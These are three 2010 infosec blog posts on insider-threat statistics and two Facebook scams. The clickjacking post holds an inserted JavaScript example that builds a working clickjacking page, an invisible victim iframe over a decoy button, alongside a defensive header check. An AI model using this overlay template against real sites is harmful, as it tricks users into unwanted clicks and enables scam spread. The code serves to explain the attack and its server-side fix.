Friday, August 27, 2010

Verizon's Insider Threat

You've heard the pseudo-axiomatic bull-puckey that 80% of attacks are internal. As if this were universally true everywhere on Earth and everyone just "knows" this fact, like they know the hue of the sky.

Somewhere along the way (I was hearing this when I first got into infosec in the mid-'90s) some government study came to this conclusion. Quite possibly the CSI/FBI computer crime surveys were at the root; I really don't know, and it really doesn't matter.

I'm not saying there isn't an insider threat, or denying that insider access increases the impact of successful attacks and thus the risk. I'm not even particularly disagreeing with 80%, because I'm sure there are cases where that figure is accurate.

But we as infosec professionals have to understand our own unique threats rather than blindly quoting some nearly urban-legendary statistic as if it applied everywhere.

Verizon's insider-threat data, according to this article, lends some credence to the notion that insider threat is a big deal, where the bigness of the deal varies from company to company. It also suggests that the problem, at Verizon specifically, isn't as bad as the oft-quoted 80%.

Less interesting to me than the actual numbers is the fact that they collect these metrics in the first place. Do you? Should you? I think so. How do (or would) you go about it?

And how do you, at the same time, remain mindful of the fact that we don't know what we don't know? I hate it when infosec professionals tell me, for example, "we've had xxx incidents this year" and forget to add the phrase "that we know of".

Thursday, August 19, 2010

Facebook Clickjacking Scam

More bad things on Facebook: this Network World article describes a Facebook clickjacking scam that entices users to view some photos or some such. It hides a functional Share button underneath a Next button, with some social engineering that entices users to click, unknowingly spreading the worm/thingy; then they are taken to a survey that generates money for the scammers.
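To make the "functional button hidden under a decoy" trick concrete, here is an added example. It is not code from this post, from the Network World article, or from the scam itself; the URLs, header sets and helper names are hypothetical. The first function builds the attacker-side layout (an invisible iframe of the victim page stacked over a visible decoy button), and the second checks whether a victim site's response headers would make a browser refuse to render it inside someone else's frame, which is the server-side fix for the whole class of attack.

```javascript
// Added example (not from the original post). All URLs are placeholders.
//
// (1) Attacker page. The victim site is loaded in an iframe with opacity:0
// and a higher z-index than the decoy button, so the user sees "Next" but
// the click lands on the victim's real Share button. A real scam tunes the
// top/left offsets so the hidden button sits exactly under the decoy.
function buildClickjackPage(victimUrl, decoyLabel) {
  return `<!doctype html>
<html><body>
<button style="position:absolute; top:200px; left:300px; z-index:1;">${decoyLabel}</button>
<iframe src="${victimUrl}"
        style="position:absolute; top:150px; left:250px; width:600px; height:400px;
               opacity:0; z-index:2; border:0;"></iframe>
</body></html>`;
}

// (2) Defender check. Given the victim page's response headers, decide
// whether a browser will refuse to render it inside a frame hosted at
// framerOrigin. Content-Security-Policy frame-ancestors takes precedence
// in modern browsers; X-Frame-Options is the older header that 2010-era
// browsers understood. Scheme-only sources ("https:") and wildcard hosts
// ("*.example") are not modelled here.
function framingBlocked(headers, pageOrigin, framerOrigin) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = v;

  const csp = lower['content-security-policy'];
  if (csp) {
    const directive = csp
      .split(';')
      .map((s) => s.trim())
      .find((s) => s.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return true;
      if (sources.includes('*')) return false;
      if (sources.includes('self') && framerOrigin === pageOrigin) return false;
      if (sources.includes(framerOrigin.toLowerCase())) return false;
      return true; // framer not in the allow-list: browser blocks it
    }
  }

  const xfo = (lower['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return true;
  if (xfo === 'SAMEORIGIN') return framerOrigin !== pageOrigin;
  return false; // no anti-framing header at all: the overlay above works
}

// Constructed sample header sets for three hypothetical sites.
const SAMPLE_HEADERS = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
};

// Evaluate every sample against an attacker-hosted framer.
function assessSamples(pageOrigin, framerOrigin) {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
    out[name] = framingBlocked(headers, pageOrigin, framerOrigin);
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildClickjackPage('https://victim.example/share', 'Next'));
  console.log(assessSamples('https://victim.example', 'https://attacker.example'));
}
```

Note the order of the checks: a page that only sends `X-Frame-Options: SAMEORIGIN` is still framable by its own origin, which matters if the site has an HTML-injection bug anywhere, and a page with no header at all is exactly the situation the scam above relies on. Client-side add-ons such as NoScript's ClearClick catch the overlay on the user's machine, but the header is what fixes it for everyone.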

NoScript detects the attack. Cool. I've just started using this add-on myself. It seems to add a pretty solid layer of defense to Firefox.

Wednesday, August 18, 2010

Facebook Dislike Button Scam

All you overly paranoid infosec people who scoff at the slightest hint of risk-taking can just take a chill pill right now. It'll take you a few years to learn (and I hope you do learn, for the sake of the companies you're supposed to be protecting) that there's no place for ultra-paranoia in the business world. Maybe I'll explain that in another post.

I bring up this point because I can just hear some infosec folks sniffing arrogantly when I admit that I use Facebook. Well, guess what: I am balancing risk versus benefit, something those sniffly infosec people should try sometime.

There are risks I'm taking by using Facebook and, in fact, I did get partially snookered by the Facebook Dislike Button Scam, in that I clicked "Like" when I saw the thing. I didn't actually use it. And I'd like to believe that if I had, I'd have gotten suspicious when it tried to run a survey and would have disallowed access to it in the end.

Guess what: social engineering works beautifully, even occasionally on an infosec pro. There's no way to reliably patch wetware against it.

The best we can do is achieve a reasonable, helpful level of paranoia that prevents us from doing overly stupid things.

Then hope the rest of our technology defenses protect us from our slightly stupid mistakes.